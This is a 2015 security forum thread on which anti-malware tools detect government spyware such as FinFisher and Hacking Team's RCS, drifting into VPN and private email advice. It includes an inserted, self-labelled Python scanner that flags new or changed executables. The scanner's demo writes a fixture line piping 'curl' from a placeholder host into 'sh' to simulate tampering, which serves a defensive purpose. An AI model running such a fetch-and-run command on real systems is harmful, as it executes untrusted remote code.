Best software for detecting government spy malware

Discussion in 'other anti-malware software' started by kinder2, Aug 18, 2015.

  1. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    All the anti-malware software focuses on finding malware made by criminals.
    But today we are getting more malware used by governments for spying, like Hacking Team and Gamma FinFisher, even NSA malware.
    I know some anti-malware software ignores these government ones. Like Norton and McAfee, they turn a blind eye to US government malware, because they are US companies. When Malwarebytes was given samples of FinFisher malware, they ignored it, saying it was "too old" for them to care about. This is not a good attitude.
    Kaspersky and Bitdefender say they will detect government malware. Kaspersky seems serious about it, Bitdefender not so certain.
    There is old software, Detekt, for finding old FinFisher. It is useless now.
    Does anyone have an opinion on which anti-malware software is best for finding government malware?
     
  2. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    17,042
    This is where an app like AppGuard comes in handy. Anything that violates its rules is blocked, whether it's good or bad, so it covers you on this.
     
  3. hjlbx

    hjlbx Guest

    @kinder2

    Hacking Team black-listed Emsisoft since both EAM and EIS detect their surveillance suites. Also, it did well at detecting Gamma International's FinFisher surveillance suite. Comodo does well at detecting surveillance suites as well.

    Also, as @Peter2150 states, an anti-executable is indispensable for very high-level system security.

    Just food for thought...
     
  4. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    Thanks, Emsisoft has a blog post showing leaked Gamma and Hacking Team documents stating that their malware is ineffective against Emsisoft.
    http://blog.emsisoft.com/2015/07/27...which-protection-their-trojans-cant-get-past/
    The blog shows a partial screenshot of other programs that block Gamma and Hacking Team, but it is an incomplete screenshot. Does anyone have the link to the complete list of anti-malware software detecting Gamma and Hacking Team malware?
     
  5. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    AppGuard is going to be too annoying to use; it will block or warn about far too many legit operations rather than finding the bad ones.
     
  6. ComputerSaysNo

    ComputerSaysNo Registered Member

    Joined:
    Aug 9, 2012
    Posts:
    1,416
    There is no product available that can detect unknown threats like zero-day exploits. This is the reality of the world we live in.

    Anti-exploit software is a good tool to have, but it does not prevent you from being compromised 100% of the time.

    If you look at the "Echelon NSA Group", they were using undetectable hard drive firmware rootkits to get persistence. Good luck blocking that exploit.

    You need a layered approach to security which includes a hardened OS, browser hardening, anti-malware, behavior blocker/HIPS, and anti-exploit.

    I only have 1 Windows box and that is for work. My home boxes I use Linux or OpenBSD. But I harden the crap out of my work box.
     
  7. ArchiveX

    ArchiveX Registered Member

    Joined:
    Apr 7, 2014
    Posts:
    1,015
    When it comes to zero-day exploits,
    most security software...
     
  8. Peter2150

    Peter2150 Global Moderator

    Joined:
    Sep 20, 2003
    Posts:
    17,042
    Not once it is set up. But the point is it does what you want. EIS is great also.
     
  9. Paul R

    Paul R Registered Member

    Joined:
    Aug 5, 2014
    Posts:
    48
    Location:
    Bury, Lancashire

    http://ht.transparencytoolkit.org/K... Summary - ]HT[ :: KnowledgeBase Product.html
     
  10. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    331
    I will tell you a secret: RCS and FinFisher are just like any other malware and in no way as complex as projects like Stuxnet, Careto, Regin, GrayFish, Duqu 2, etc.
     
  11. luciddream

    luciddream Registered Member

    Joined:
    Mar 22, 2007
    Posts:
    2,497
    People that know me know I'm definitely vehemently against relying on an AV/AM product, and especially an (all eggs in 1 basket) suite to deal with such a contingency. But that said, as others have pointed out, if I were to use an AV as a layer Emsisoft AM would be it.
     
  12. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    Last edited by a moderator: Aug 19, 2015
  13. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    Yes, those projects are used by the NSA; we cannot do anything about them. But we should do something about RCS and FinFisher, which are regularly used by police to snoop on persons of interest without a warrant, injected through mobile phone vulnerabilities and ISP-level cooperation (so there is no defence against getting that malware).
     
  14. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    331
    I think it's a bit naive to only focus on two families of malware.

    1. Government agencies can choose from more backdoors than just FinFisher and RCS.
    2. It is possible to protect against the infection techniques used. Permanently using a VPN would rule out the chance of any network injector being used, and running exploit mitigation software would significantly decrease the chance of your software getting exploited. (AFAIK none of the leaked HT exploits employed EMET bypasses, for example.)
     
  15. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    1. I know there are more backdoors than FinFisher and RCS. I am trying to avoid security companies that ignore or shut their eyes to government malware. My thinking is that if a security company detects both FinFisher and RCS now, they will probably detect other government backdoors in future.
    2. Permanent VPN use sounds wonderful in theory, but it does not work well when accessing some services like Gmail, banking, eBay and even Google search. These sites know you are using a VPN. Flags are raised requiring further verification by phone or captcha. I refuse to do phone verification when accessing email. Do you have a way to combine VPN and personal emailing comfortably? What exploit mitigation software do you have in mind? I find HIPS annoying; sometimes opening up a piece of software creates a hundred pop-ups needing to be clicked "accept" before one can continue with work.
     
  16. ropchain

    ropchain Registered Member

    Joined:
    Mar 26, 2015
    Posts:
    331
    Or just use a scanner that detects new executable files, and determine manually whether a file is legit or not.

    Only once I have had problems regarding online accounts and the usage of VPN: An important account of mine once got revoked because they thought that my account had been hijacked...

    I only inform people about solutions that exist, I try to never recommend software to people on the Wilders forums for obvious reasons.
     
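A minimal version of the "scanner that detects new executable files" ropchain describes, as an added example that is not from the thread or from any product named in it. It hashes every executable-looking file under a directory into a baseline, then on a later run reports files that are new or whose content changed, so the operator can vet them by hand. Executables are recognised by content (MZ, ELF and shebang magic) rather than by extension, so a dropper written with a harmless-looking name is still caught. The directory layout, file contents and the `.baseline.json` name are all constructed for the demonstration.

```python
"""Baseline-and-diff scanner for newly appeared or modified executables.

Added example (not from the thread). Run it directly to see the report
for a constructed scenario, or import it and call scan()/diff() on a
real directory with your own baseline file.
"""
import hashlib
import json
import os
import shutil
import tempfile

# Content signatures for "executable-looking" files; extension is ignored
# on purpose so renamed binaries (update.tmp, cache blobs) are not missed.
MAGIC = {b"MZ": "pe", b"\x7fELF": "elf", b"#!": "script"}


def file_kind(path):
    """Return 'pe', 'elf', 'script' or None based on the first bytes."""
    with open(path, "rb") as f:
        head = f.read(4)
    for magic, kind in MAGIC.items():
        if head.startswith(magic):
            return kind
    return None


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def scan(root):
    """Return {relative_path: [kind, sha256]} for executable-looking files."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            kind = file_kind(full)
            if kind:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                found[rel] = [kind, sha256_of(full)]
    return found


def save_baseline(snapshot, path):
    with open(path, "w") as f:
        json.dump(snapshot, f, indent=2, sort_keys=True)


def load_baseline(path):
    with open(path) as f:
        return json.load(f)


def diff(baseline, current):
    """Classify current files against the baseline; hash mismatch = changed."""
    new = sorted(p for p in current if p not in baseline)
    changed = sorted(p for p in current
                     if p in baseline and current[p][1] != baseline[p][1])
    removed = sorted(p for p in baseline if p not in current)
    return {"new": new, "changed": changed, "removed": removed}


def _write(root, rel, data):
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "wb") as f:
        f.write(data)


def demo():
    """Constructed scenario: take a baseline, then plant a new PE file under a
    non-executable name and tamper with an existing script."""
    root = tempfile.mkdtemp()
    try:
        _write(root, "bin/tool.exe", b"MZ" + b"\x90" * 64)       # known PE
        _write(root, "notes.txt", b"just text, not executable")
        _write(root, "scripts/run.sh", b"#!/bin/sh\necho hi\n")
        baseline_file = os.path.join(root, ".baseline.json")   # starts with '{', so never flagged
        save_baseline(scan(root), baseline_file)

        # Later: a dropper appears with an innocuous name, and run.sh is modified.
        _write(root, "cache/update.tmp", b"MZ" + b"\xcc" * 64)
        _write(root, "scripts/run.sh", b"#!/bin/sh\ncurl http://example.invalid/x | sh\n")

        return diff(load_baseline(baseline_file), scan(root))
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for category, paths in demo().items():
        print(f"{category}: {paths}")
```

The report for the constructed scenario lists `cache/update.tmp` as new and `scripts/run.sh` as changed while `notes.txt` is never considered, which is the behaviour ropchain is after: the tool surfaces candidates, and the decision about whether each one is legitimate stays with the user. On a real system the baseline should be stored and checked somewhere the scanned machine cannot silently rewrite it, otherwise an implant with write access can simply re-baseline itself.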
  17. TomAZ

    TomAZ Registered Member

    Joined:
    Feb 27, 2010
    Posts:
    1,002
    Location:
    USA
    I agree with this one! I'm not a seasoned vpn user, but I have tried it on several occasions and run into the same exact thing.
     
  18. Timok

    Timok Registered Member

    Joined:
    Jul 3, 2010
    Posts:
    51
    Location:
    Germany
  19. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    Riseup is by referral only, mailbox.org has a monthly fee, posteo.de and protonmail.ch make people think I am in Germany or Switzerland, systemli.org makes people think I am a system administrator.
    There is a public perception today that everyone has a Gmail or Hotmail/Outlook or Yahoo account; anything other than that is suspicious. These main providers hammer VPN users hard.
    The link you gave for stopping VPN detection, does it work for Google? I have a feeling it stops VPN detection from browser fingerprinting, but it does not stop VPN detection from IP address checking, which most sites like Google do in real time.
    If you use 24/7 VPN, how do you deal with your banking sites and Google asking for a captcha every so often?
     
  20. subhrobhandari

    subhrobhandari Registered Member

    Joined:
    Nov 6, 2009
    Posts:
    708
    How about Openmailbox, Ghostmail or SCryptmail?

    Usually in VPN clients (saw this in CyberGhost, don't know about others) you can whitelist domains, which will be connected to directly.
     
  21. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51
    These mail suggestions are better; still, if you were to do business and give out a non-Gmail/Hotmail/Outlook/Yahoo account, it would immediately raise suspicion.
    Whitelisting domains exposes the user to injection attacks. Example: you whitelist Gmail; the ISP can see you request the Gmail domain, it intercepts the traffic and lets you download malware instead of the real Gmail. The only way to be safe from injection attacks by government or police is to have the VPN on all the time, which is impossible when living a socially acceptable life.
     
  22. Timok

    Timok Registered Member

    Joined:
    Jul 3, 2010
    Posts:
    51
    Location:
    Germany
    WTF - I don't use online banking and I don't use my Googlemail (I just have it for my Android phone to buy some apps). On Googlemail an auto-responder is active with the information that Googlemail is insecure. If someone wants to communicate with me he has to use my addresses :) And I also don't care what country people think I come from.

    @subhrobhandari

    scryptmail.com looks good
     
  23. subhrobhandari

    subhrobhandari Registered Member

    Joined:
    Nov 6, 2009
    Posts:
    708
    What I do: I use my Gmail main account for all official mails and most of the personal mails. I redirect some of my important mails, like transaction history, gift vouchers etc., to two other non-Google mail servers as soon as I log in, just to be sure I have a backup somewhere else other than my computer. I saw that last week Google's Belgium datacenter permanently lost some user data due to a lightning strike, so it's better to be safe. As much as I would like to use Autistici (or such emails) for most of my personal emails, I can't. Apparently it's pretty hard to teach the family members why ol' Google is evil.

    This thread has gone off topic. ;)
     
  24. quietman

    quietman Registered Member

    Joined:
    Dec 27, 2014
    Posts:
    491
    Location:
    Earth .... occasionally
    I agree, subhrobhandari, off topic.....

    There is much more about Scryptmail in the Email options thread, including posts from the developer.

    Note that it has US-based servers and is subject to US jurisdiction (I know that is an issue for some!)
     
  25. kinder2

    kinder2 Registered Member

    Joined:
    Aug 17, 2015
    Posts:
    51